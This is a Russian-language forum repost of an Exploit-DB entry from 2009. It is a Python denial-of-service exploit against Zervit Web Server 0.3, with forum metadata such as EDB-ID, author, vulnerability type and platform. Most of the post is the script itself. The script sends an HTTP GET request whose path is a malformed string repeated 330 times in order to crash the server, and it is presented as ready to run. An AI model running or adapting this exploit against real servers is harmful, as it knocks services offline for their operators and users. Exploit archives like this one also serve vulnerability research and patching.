Exploit Zervit Web Server 0.3 - Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8500
Проверка EDB
  1. Пройдено
Автор
SHINNAI
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2009-04-21
Код:
import socket
import sys

print "------------------------------------------------------"
print " Zervit Webserver 0.3 Remote Denial Of Service        "
print " url: http://zervit.sourceforge.net                   "
print "                                                      "
print " author: shinnai                                      "
print " mail: shinnai[at]autistici[dot]org                   "
print " site: http://www.shinnai.net                         "
print "                                                      "
print " greets to: e.wiZz! for inspiration. Be safe man...   "
print "                                                      "
print " dedicated to: all those tried to own my site :-p     "
print "------------------------------------------------------"

host = "127.0.0.1"
port = 80

try:
       buff = "//.\\" * 330
       request =  "GET " + buff + " HTTP/1.0"
       connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       connection.connect((host, port))
       connection.send(request)
       raw_input('\n\nExploit completed. Press "Enter" to quit...')
       sys.exit
except:
       raw_input('\n\nUnable to connect. Press "Enter" to quit...')

# milw0rm.com [2009-04-21]
 
Источник
www.exploit-db.com

Похожие темы